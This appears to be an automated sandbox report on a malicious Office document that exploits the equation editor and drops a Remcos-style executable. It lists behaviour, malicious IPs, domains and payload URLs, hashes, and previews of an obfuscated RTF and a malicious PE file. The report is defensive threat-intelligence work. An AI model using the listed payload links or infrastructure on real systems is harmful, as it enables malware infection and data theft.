Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
Execution Graph export aborted for target EQNEDT32.EXE, PID 3164 because there are no executed function
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:40:03	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
10:39:54	API Interceptor	75x Sleep call for process: EQNEDT32.EXE modified
10:40:02	API Interceptor	7492446x Sleep call for process: svchost.exe modified
10:40:12	API Interceptor	12x Sleep call for process: wscript.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	http://host.cloudsonicwave.com	Get hash	malicious	Unknown	Browse	host.cloudsonicwave.com/favicon.ico
	alWUxZvrvU.exe	Get hash	malicious	FormBook	Browse	www.avantfize.shop/q8x9/
	foljNJ4bug.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/fxts/
	RRjzYVukzs.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
	octux.exe.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exe	Get hash	malicious	FormBook	Browse	www.jandjacres.net/gwdv/?arl=VZkvqQQ3p3ESUHu9QJxv1S9CpeLWgctjzmXLTk8+PgyOEzxKpyaH9RYCK7AmxPqHPjbm&Ph=_ZX8XrK
	BILL OF LADDING.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
	http://embittermentdc.com	Get hash	malicious	Unknown	Browse	embittermentdc.com/favicon.ico
	scan_374783.js	Get hash	malicious	AgentTesla	Browse	paste.ee/d/gvOd3
	IRYzGMMbSw.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/yuvr/
188.114.96.3	DRAFT DOC2406656.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sirr/five/fre.php
	lv961v43L3.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
	10092024150836 09.10.2024.vbe	Get hash	malicious	FormBook	Browse	www.airgame.store/ojib/
	Hesap-hareketleriniz.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/59fb/
	octux.exe.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	bX8NyyjOFz.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/2uvi/
	lWfpGAu3ao.exe	Get hash	malicious	FormBook	Browse	www.serverplay.live/71nl/
	sa7Bw41TUq.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/0r21/
	E_receipt.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/VO2TX
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/fOmsJ2bL/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
shuvi.io	STATEMENT - PAYMENT TRACKING Sept 2024.docx.doc	Get hash	malicious	Remcos	Browse	188.114.97.3
geoplugin.net	STATEMENT - PAYMENT TRACKING Sept 2024.docx.doc	Get hash	malicious	Remcos	Browse	178.237.33.50
	narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsf	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.js	Get hash	malicious	Remcos	Browse	178.237.33.50
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Salary Increase Letter_Oct 2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	PO-95958694495545.xls	Get hash	malicious	Remcos	Browse	178.237.33.50
	DHL AWB DOCS- 9284730932.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	MV STARSHIP AQUILA_pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	1728486965f09c65efe9ac8095b3334d8c21391956afcf95821ee79f205e6ccc5199206ffd610.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	n92fR6j8tl.rtf	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://coin-have.c0m	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.Win32.CrypterX-gen.869.7164.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	20062024150836 11.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
CLOUDFLARENETUS	http://coin-have.c0m	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.Win32.CrypterX-gen.869.7164.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	20062024150836 11.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
ATOM86-ASATOM86NL	STATEMENT - PAYMENT TRACKING Sept 2024.docx.doc	Get hash	malicious	Remcos	Browse	178.237.33.50
	narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsf	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.js	Get hash	malicious	Remcos	Browse	178.237.33.50
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Salary Increase Letter_Oct 2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	PO-95958694495545.xls	Get hash	malicious	Remcos	Browse	178.237.33.50
	DHL AWB DOCS- 9284730932.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	MV STARSHIP AQUILA_pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	1728486965f09c65efe9ac8095b3334d8c21391956afcf95821ee79f205e6ccc5199206ffd610.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	n92fR6j8tl.rtf	Get hash	malicious	Remcos	Browse	178.237.33.50
AS-COLOCROSSINGUS	facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	198.46.178.134
	Orden de Compra 097890.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	198.46.178.134
	172866025525495dd8e8afca3f3b56403378ef77acfe3af22ea24afc36e105013588df0d1b286.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.3.101.184
	ESUTbYTvlp.elf	Get hash	malicious	Unknown	Browse	172.245.184.204
	na.elf	Get hash	malicious	Unknown	Browse	192.3.165.37
	PO-95958694495545.xls	Get hash	malicious	Remcos	Browse	107.173.4.16
	ROQ_972923.exe	Get hash	malicious	FormBook	Browse	108.174.58.39
	COT139562833.ATMetorlogya.xls	Get hash	malicious	Unknown	Browse	172.245.191.98
	COT139562833.ATMetorlogya.xls	Get hash	malicious	Unknown	Browse	172.245.191.98
	PAYMENT APPLICATION.xls	Get hash	malicious	Unknown	Browse	172.245.123.25
AS-COLOCROSSINGUS	facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	198.46.178.134
	Orden de Compra 097890.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	198.46.178.134
	172866025525495dd8e8afca3f3b56403378ef77acfe3af22ea24afc36e105013588df0d1b286.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.3.101.184
	ESUTbYTvlp.elf	Get hash	malicious	Unknown	Browse	172.245.184.204
	na.elf	Get hash	malicious	Unknown	Browse	192.3.165.37
	PO-95958694495545.xls	Get hash	malicious	Remcos	Browse	107.173.4.16
	ROQ_972923.exe	Get hash	malicious	FormBook	Browse	108.174.58.39
	COT139562833.ATMetorlogya.xls	Get hash	malicious	Unknown	Browse	172.245.191.98
	COT139562833.ATMetorlogya.xls	Get hash	malicious	Unknown	Browse	172.245.191.98
	PAYMENT APPLICATION.xls	Get hash	malicious	Unknown	Browse	172.245.123.25

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	STATEMENT - PAYMENT TRACKING Sept 2024.docx.doc	Get hash	malicious	Remcos	Browse	188.114.97.3 188.114.96.3
	facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.97.3 188.114.96.3
	Orden de Compra 097890.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.97.3 188.114.96.3
	RFQ.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	Quote101024.doc	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	PO-95958694495545.xls	Get hash	malicious	Remcos	Browse	188.114.97.3 188.114.96.3
	klYCjbl66s.rtf	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	1njpP9QcUg.rtf	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	n92fR6j8tl.rtf	Get hash	malicious	Remcos	Browse	188.114.97.3 188.114.96.3
	Ordin de plat#U0103.docx.doc	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
7dcce5b76c8b17472d024758970a406b	STATEMENT - PAYMENT TRACKING Sept 2024.docx.doc	Get hash	malicious	Remcos	Browse	188.114.97.3 188.114.96.3
	QKnj2Wb3yo.xlsx	Get hash	malicious	Hidden Macro 4.0	Browse	188.114.97.3 188.114.96.3
	KjFT0qPTo4.vbs	Get hash	malicious	FormBook	Browse	188.114.97.3 188.114.96.3
	Quotation_398893.xlam.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	Documentosrs.ppam	Get hash	malicious	RevengeRAT	Browse	188.114.97.3 188.114.96.3
	PO-95958694495545.xls	Get hash	malicious	Remcos	Browse	188.114.97.3 188.114.96.3
	COT139562833.ATMetorlogya.xls	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	Ordin de plat#U0103.docx.doc	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	COT139562833.ATMetorlogya.xls	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	PAYMENT APPLICATION.xls	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02573908657392288
Encrypted:	false
SSDEEP:	6:I3DPcHvyoKuP9HvxggLRj8/etf/tRXv//4tfnRujlw//+GtluJ/eRuj:I3DPU9PPceZbvYg3J/
MD5:	21DCCF6BAE0719DCDB0533E1E50F6D82
SHA1:	44A5CF1723E1EBED117FB33C384718A14C6DB7E0
SHA-256:	A4C7250EBCD74226AD8A7B0398E56DFCD0DD86A7F1A46790454F4025119DC8CA
SHA-512:	02EACD9F7DAA5227CA839D77B719203CCB514B8784CEF013E8CC9CB50788B145212F516905680FA5ECEC160CD87951C33F6D3A66AB513F32158280E46D717AB8
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z@r.'m..C..[..1.+S,...X.F...Fa.q............................t...7.sB..."...6............D.CG....".u......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.013811273052389
Encrypted:	false
SSDEEP:	12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:	18BC6D34FABB00C1E30D98E8DAEC814A
SHA1:	D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
SHA-256:	862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
SHA-512:	8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wecreatednewthigsforsuccessfulljournecyrverynicepeoplesetirethigstogoformegreat________nnicwaytoentreithigntochangewithmegreat[1].doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Rich Text Format data, version 1
Category:	dropped
Size (bytes):	88612
Entropy (8bit):	2.9267754728039796
Encrypted:	false
SSDEEP:	768:t9QdTYkH9SFwul5U0mGL8ogS2fw6Vgr9JE:Mkkdzuglo8og3fJVmE
MD5:	C7B4EC460B896CCD9F368467D06EE44B
SHA1:	58D4ED5D5791401F4555D6278A179E5C65563C8A
SHA-256:	7B33DE62DAFEF125FE428AFE47E9A353749A6632D58809CE428B7514886B49B6
SHA-512:	D82B5ECC391F92E17161CE7B98F62B273F9A51D6C294272AACC1EFA1B2D2DC7C8C1095103197D6FE023B21D8B161978C4C6073AED78758649031DA99FD687D9C
Malicious:	false
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].doc, Author: ditekSHen
Preview:	{\rtf1..{\\fuAM1lx8ZkPnbkOCimO5dV3rHvsM8U67kI1ddcL4KhvChijOW80CM7opbLd7k2Mg4EWGPEhOERIGzLNu}..{\2132927736(??80.<2?\|]-~.(`,,($$%3%>?['%?970`6@9%24?%>=!/?9]%.`_:=..-!8]6?.2+>4<33=[?.$]&%/~-6>+_#,%?:;-9,?(\|6'=8&-69%.9[=~).[4^@?3%:%].$?0/^3?!4]%]=1).?9`<$]0.2>;?@15,?19?'!!:???).6219.?<9?#',?@.)>\|94,!<%'.?$??:>'?9]_`<+]3`=.%0./.2?.\|^0..7/>0&.3/5%]\|[!/3&4?%~?.\|9#7]>--,~1`%.)>]?\|+1^\|6/35'?/310&.^??8-,?8^/9:00\|`:_^)>+&?,?2+#?[$\|1+'$??(%.(@=7.)?%,26?<5?:^9.*_%!2?;1.0>^`7.!?)7>83?`]7.(3?4+0<=)%+~8?9?(?3^/@9_:&%5.'^324_0!]48'[??.7#2~4?>~=4?[0(7@>@.?5%.3.6$1@??=.?-01!`(@53.@$8$#9#?`.($5?:\|9#?%#@__?&?$?/6./5~>(?\|0(/.#_??%.\|,#-[@18.?_%.=?<~\|1/96[^3,~4?>-+=#=.\|,/`;:~&??<]%?.[].78?.09.4..(_?.''(?!@]?@%_~/@%#@?.~,~:?@@?2+\|&?++>>#5?\|@=1@..']~89+4~/=:.`5<\|96,??%5>:+=;)9?+&^^7(;!?)<_(`(?`_;:(-=:?.!+@?=2~;???.??:9?9<7<)0%;6%7~%'??1~2],3?5_?0].'2>$'48:,/=<:=[$??<=3?:1.;>7:4>^\|9]^'4=+[^*~&%+@-?\|`&.!].@\|:9%;[+4?-<'@5)6?.%62?=-)>&(.>(89`&83'?.'-\|?.'','/?:]3`.?\|$4=.%%2\|^^[78++?:<5)[2\|4]?$'=

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290752
Entropy (8bit):	7.269682117155447
Encrypted:	false
SSDEEP:	24576:WCdxte/80jYLT3U1jfsWaNuPcgCOCYdVtL/JAc/RhmTO/wQ:fw80cTsjkWaNecFOCYDljmyL
MD5:	6539C2C942C9AA3AB9C7FE14FCCF0B4E
SHA1:	F4A663D69419E1CDEF4D31AE003C89F6C19F23C0
SHA-256:	D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
SHA-512:	9A2141A4F2AADD4613F665CCFF25E1BE5EC4B31716F2F56982220032E688A860E28C0783626DF885ECA8F120C0C7C088B1E28438FAA6F0A1C3125BA760F8BB09
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...c(.g..........".................J.............@.......................... .......N....@...@.......@.....................L...\|....p..<(......................0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...<(...p...*..................@..@.reloc..0q.......r...@..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10EEF389.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	46340
Entropy (8bit):	3.1486588282570183
Encrypted:	false
SSDEEP:	384:XTiEDqxfTfed3edmiFegX4x4yTQw2/1o90LqQl+0CbdvpEcSRIeRL:jikdOEgu4y0952ec1Q
MD5:	A429380AAFA2574DEE99DFE015236785
SHA1:	2396BF637223547213E74E630132DE4BFE77B822
SHA-256:	4C0DF4F3E97A56FD198FC092D1031A47FD873A55F2676C876110E4CDA2ABAF90
SHA-512:	854A0014D8BF91B3035C31C008A2C23E0DFEF8ED3A2480A6F2993AD43E03F582E3D8868E6BBB5C209C6544640C890216BA846765EC710FF2C55635E9FF99DA39
Malicious:	false
Preview:	....l...........N................@.._Y.. EMF........7.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................O.......%...........%...........R...p................................@. C.a.l.i.b.r.i.........................................................D................................2%.........d...........0.......0...............E.......0.......0.......0.....7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i.......................................................................................&.f.............`.0.....X.0.....`.0...............E.....X.0.....X.0.....`.0.....7......................@.N..............C.a.l.i.b.r.i...........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\135D5E9C.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	38272
Entropy (8bit):	2.8200425031385645
Encrypted:	false
SSDEEP:	192:6/UjPGlVrhaHoq7x0ii1lild6rMT54GtXU+j9hMQmlC+a6gz5nCf5OBgJP+SKA:6/1MH61lq4GtXJMQmlC+a6gz5SOyJ1/
MD5:	C898CDC91D0BD5EFB41E576B8A19E931
SHA1:	B9ED5CAC5A526CF8095AB8F8CE36C39F78422407
SHA-256:	044E7012311B28991E687A081E1AC94B7D7EB80F1BE1970F519E949D01A05CA2
SHA-512:	6BCD700AAB23B2205E8294C3071158CA42D4BA6B4B098CA6B511A386FF2E1F8D6B6A3BED4F307475F03161F96425194DEA5581411D3544E95F6D17BCD3264019
Malicious:	false
Preview:	....l...........c................N...@.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d.......'.......................%...........................................................L...d...........c...............d.......!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14B4F450.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	2342852
Entropy (8bit):	2.6417290025884554
Encrypted:	false
SSDEEP:	6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
MD5:	B2020C2F370E4625A9EA3C36EEA00DAF
SHA1:	3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
SHA-256:	BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
SHA-512:	78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
Malicious:	false
Preview:	....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\329827A8.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	2342852
Entropy (8bit):	2.6417290025884554
Encrypted:	false
SSDEEP:	6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
MD5:	B2020C2F370E4625A9EA3C36EEA00DAF
SHA1:	3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
SHA-256:	BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
SHA-512:	78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
Malicious:	false
Preview:	....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54DB6EDE.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	8084
Entropy (8bit):	2.570503528684488
Encrypted:	false
SSDEEP:	96:j+RiOO++Z397Q2Acgze0xBdEQzBfCC7Boff8oBJ6ANQ4HJV:jt7ecgKgvzBArH
MD5:	A0D51FBAA34316A0B3E02FA2B5BEA0B8
SHA1:	01B3F570EFCA831762B154AC65E11C122319D35D
SHA-256:	BC55995ADDDFBE0105BDACE8E1603EA7E9DA698C0BDC7E91F043578BF6B28157
SHA-512:	93E08DF7E102CCD3D9077284E1E80369A21BA86B9194B72528BB140ABA83E65E7E2DC59471E2484AE805AF1C13E41C6A5273150E2EFAB06CABFA21BC889405E5
Malicious:	false
Preview:	....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CABF5ED.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	884312
Entropy (8bit):	1.2944965349348616
Encrypted:	false
SSDEEP:	1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
MD5:	9ABE7EB352E0DB96B52C99AC2FDEA85F
SHA1:	8DC45D02308275BA32B7FFB320A3042256D40C8B
SHA-256:	EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
SHA-512:	E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
Malicious:	false
Preview:	....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90FF1547.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	76472
Entropy (8bit):	3.025081600163608
Encrypted:	false
SSDEEP:	384:luYYST5PIYfLe2b52XPl6hAJC00EddMdf0Ii90Z5xxr8sdEdeC:4igYfqg52XPl6hAJC0irRHC
MD5:	A4B79FF3D7725F69AB98C49A72805D64
SHA1:	8617AF425CE74F816B2CE28FF7BF08A7F5317030
SHA-256:	2DE8B86E62DE48780D92E82B3132F559DF0324A000F9BAFC8CAF3D2789D17CE5
SHA-512:	3B7E25DBDFDAD51FFD8DB140091405FABD3242704C0FD0517CEB10C59E5AF57098CA41C3DCA9F9E80045D8A75EE8415927467457E636EA475C0BE95063C94C49
Malicious:	false
Preview:	....l..............................eQ.. EMF.....*..y.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................L...d.......).......G.......)...........!..............?...........?............................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96632497.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Rich Text Format data, version 1
Category:	dropped
Size (bytes):	88612
Entropy (8bit):	2.9267754728039796
Encrypted:	false
SSDEEP:	768:t9QdTYkH9SFwul5U0mGL8ogS2fw6Vgr9JE:Mkkdzuglo8og3fJVmE
MD5:	C7B4EC460B896CCD9F368467D06EE44B
SHA1:	58D4ED5D5791401F4555D6278A179E5C65563C8A
SHA-256:	7B33DE62DAFEF125FE428AFE47E9A353749A6632D58809CE428B7514886B49B6
